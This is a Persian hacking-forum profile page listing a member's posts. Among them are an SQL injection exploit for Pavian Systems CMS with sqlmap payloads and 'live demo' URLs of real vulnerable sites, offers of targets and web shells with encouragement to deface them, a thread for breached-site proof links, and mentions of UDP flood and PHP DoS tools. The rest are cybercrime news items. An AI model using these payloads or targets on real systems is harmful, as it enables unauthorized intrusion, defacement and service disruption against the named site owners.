رفتن به مطلب
خرید اشتراک ویژه ادامه مطلب... ×

Arshia Danger

Rookie
  • تعداد ارسال ها

    60
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

21 Excellent

درباره Arshia Danger

  • درجه
    Rookie Team
  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمیشود.

  1. Arshia Danger

    تاپیک اکسپلویت های مختلف

    [HIDE-THANKS] ####################### Exploit Title : Pavian Systems CMS SQL injection Vulnerability# Exploit Author : xBADGIRL21# Vendor Homepage : http://paviansystems.com/# Dork : All Rights Reserved. Design by paviansystems.# Tested on: [ WINDOWS 7]# MyBlog : http://xbadgirl21.blogspot.com/# skype:xbadgirl21# Date: 05/10/2016# video Proof : https://youtu.be/1CyISmcwJiU####################### [<] DESCRIPTION :####################### [+] Pavian Computer Systems is leading web and software development company # [+] that focuses on the areas that are critical to achieving maximum efficiency in IT Environment Utilization# [+] AND an SQL injection has been Detected in Pavian Systems CMS####################### [<] Poc :####################### [ALL] Parameters Vulnerable To SQLi# http://localhost/allp.php?id=[sqli]####################### [<] SQLmap PoC:####################### GET parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N# sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:# ---# Parameter: product_id (GET)# Type: boolean-based blind# Title: AND boolean-based blind - WHERE or HAVING clause# Payload: product_id=38' AND 2172=2172 AND 'vXuF'='vXuF## Type: AND/OR time-based blind# Title: MySQL >= 5.0.12 AND time-based blind# Payload: product_id=38' AND SLEEP(5) AND 'nneA'='nneA# ---####################### [<] Live Demo :####################### http://cit84.com/reflections_detail.php?artid=2 # http://www.growingcrops.in/services.php?id=54# http://www.vgaexports.com/product_detail.php?product_id=38####################### Discovered by : xBADGIRL21# Greetz : All Mauritanien Hackers - NoWhere###################### [/HIDE-THANKS]
  2. Arshia Danger

    تاپیک اکسپلویت های مختلف

    باسلام در این تاپیک براتون اکسپلویت های مختلف webhacking , priv8 رو براتون میزارم حتما استقبال بشه تشکر فراموش نشه !
  3. پلیس فتا اعلام کرد که در ماجرای حمله هکری به یاهو تاکنون گزارشی از هک ایمیل کاربران یاهو در ایران نداشتیم. به گزارش افتانا (پایگاه خبری امنیت فناوری اطلاعات)، سردار سیدکمال هادیان فر، رئیس پلیس امینت فضای تبادل اطلاعات، درباره سرقت بزرگ اطلاعات از یاهو و حاشیه های پیش آمده در این مورد گفت: در ایران مشکلی از این بابت نداشتیم و تاکنون چنین گزارش هایی دریافت نشده است. کاربران ایرانی می توانند درصورت بروز هرگونه مشکلی از این بابت به صورت آنلاین با مرکز فوریت های پلیس فتا تماس بگیرند؛ اما در این زمینه تاکنون گزارشی نداشته ایم. هادیان فر با اشاره به بروز جرایم در فضای مجازی، اظهار داشت: طی ۶ ماهه اول امسال 42.5 درصد جرایم در فضای مجازی در شبکه اجتماعی تلگرام اتفاق افتاده است. هفته گذشته اخباری مبنی بر سرقت و افشای اطلاعات حساب ۵۰۰ میلیون کاربر یاهو منتشر شد که تحلیل های متعددی درباره نقص امنیتی شرکت یاهو در پی داشت. بسیاری از منابع معتبر رسانه ای و امنیتی، این نقص امنیتی را که منجر به سرقت حساب کاربری بیش از ۵۰۰ میلیون کاربر ایمیل یاهو شد بزرگ ترین سرقت اینترنتی نامیدند.
  4. فرمانده انتظامی استان گیلان از شناسایی عامل هک هزار کاربر درگاه اینترنتی که یک نوجوان 15 ساله بوده، توسط پلیس فتا خبر داد. به گزارش سیتنا، سردار "محمدرضا میرحیدری" فرمانده انتظامی استان گیلان در تشریح این خبر گفت: در پی ارجاع یک فقره پرونده از دادسرای عمومی و انقلاب شهرستان رشت به دادخواهی مدیر عامل یک شرکت خدمات پرداخت الکترونیک، مبنی بر اینکه سرور شرکت توسط افراد ناشناس هک شده و به حساب کاربری تعداد زیادی از کاربران آنها دسترسی غیر مجاز صورت گرفته، موضوع به صورت ویژه در دستورکار پلیس فتا این فرماندهی قرار گرفت. فرمانده انتظامی استان گیلان افزود: با پی جویی های فنی و پلیسی، کارآگاهان پلیس فتا موفق شدند هکر را که یک نوجوان 15 ساله اهل و ساکن خراسان شمالی بود، را شناسایی و با اخذ نیابت قضایی وی را در این استان دستگیر و به گیلان منتقل کنند. سردار میرحیدری با بیان اینکه متهم با سرعت عمل کارآگاهان پلیس فتا مواجه شده و موفق به برداشت از حساب های کاربران نشده، اظهار داشت: با توجه به ادله دیجیتال کشف شده در بازرسی از منزل متهم، وی به صراحت به جرم خود و اینکه با سوء استفاده از ضعف امنیتی سایت درگاه پرداخت الکترونیک شرکت مورد نظر، سرور شرکت را هک و به حساب کاربری بیش از هزار نفر از کاربران به صورت غیر مجاز نفوذ کرده، اعتراف کرد. این مقام ارشد انتظامی در پایان با بیان اینکه متهم به علت پایین بودن سن با تشکیل پرونده به دادگاه اطفال شهرستان رشت معرفی شد، از مدیران سایت های ایرانی خواست: با ارتقاء ضریب امنیت سایت های اینترنتی خود و رفع حفره های امنیتی اجازه دسترسی و نفوذ غیر مجاز را به هکرها ندهند. منبع خبر: سیتنا
  5. مقامات کره جنوبی مدعی شدند فرماندهی سایبری ارتش این کشور هک شده است. متهم اصلی حمله ی یادشده را کره شمالی اعلام کرده اند. به گزارش واحد هک و نفوذ سایبربان؛ دولت کره جنوبی، هک مرکز فرماندهی سایبری ارتش این کشور را پس از کشف یک کد مخرب در سیستم های این مرکز، رسماً اعلام کرد. چگونگی ورود کد یادشده به سرور مسیریاب شبکه های فرماندهی سایبری کره جنوبی، مشخص نیست.طبق گفته ی کیم، عضو کمیته ی دفاع ملی کره جنوبی؛ بر روی این سرور که به منظور اتصال سیستم های ارتش به اینترنت تعبیه شدهاست، تدابیر امنیتی بسیاری در نظر گرفته بوده است.وی همچنین در ادامه افزود: امکان به سرقت رفتن اطلاعات در حمله یادشده، بسیار ضعیف است؛ زیرا شواهدی مبنی بر اتصال کامل سیستم های مهاجمان به سرورهای هدف وجود ندارد. متهم معمول این دست حملات به کره جنوبی، همواره کره شمالی است. هرچند محققان و بازرسان تا زمان تکمیل روند تحقیقات نمی توانند با اطمینان کامل این امر را تائید کنند.کره جنوبی در سال گذشته نیز، بارها شمالی ها را به سازمان دهی عملیات سایبری علیه این کشور متهم نموده است.
  6. اتریش از نفوذ ویروس استاکس نت به تأسیسات راهبردی خود خبر داد. به گزارش واحد هک و نفوذ سایبربان؛ اداره جرم فدرال اتریش حمله به تأسیسات این کشور از طریق ویروس مخرب استاکس نت را چالش جدید امنیتی برای کشور خواند.این نهاد از نیروهای مسلح, اداره امنیت سایبری کشور و همچنین از نخبگان و کارشناسان اداره اطلاعات و ارتباطات اتریش خواست تا طرح های خود را برای مقابله با این حملات ارائه کنند.هنوز خبری درباره اینکه این حملات از کجا هدایت می شده، منتشرنشده است. ویروس استاکس نت در سال 2010 برای خرابکاری در تأسیسات هسته ای ایران ساخته و راه اندازی شد
  7. http://akdwp.home.pl/images/hc.txt http://www.rstone.ir/images/hc.txt
  8. با سلام و خسته نباشید خدمت دوستان در این بخش تست امنیت سایت ها با اپلودر ها رو براتون میزارم ! موفق باشید
  9. با سلام در این تاپیک لینک اثبات سایت های مورد نفوذ قرار گرفته با لینک اثبات مورد پذیرش است و به نام تیم ! به نام : Breach Team موفق باشید ! -----------------------------------------------------------------------------------------------------
  10. با سلام خدمت دوستان در این پست برای شما تارگت هایی میزاریم و شل هایی که بتونید از اونا استفاده کنید لطفا تارگت هارو خراب نکنید با دیفیس کردن بخشی از جاشو دیفیس کنید و شلو اکسس رو خراب نکنید موفق باشید ! متخصص هک و امنیت ! باگ ها : Sql - xss - rfi - rfu - dnn - fckeditor - bypass admin - و بقیه باگ ها گزاشته میشود موفق باشید!
  11. اینم یکی دیگه از UDP Flood
  12. سلام دوستان امروز برای شما PHP Curl DoS آوردم به زبان PHP امیدوارم خوشتون بیاد
×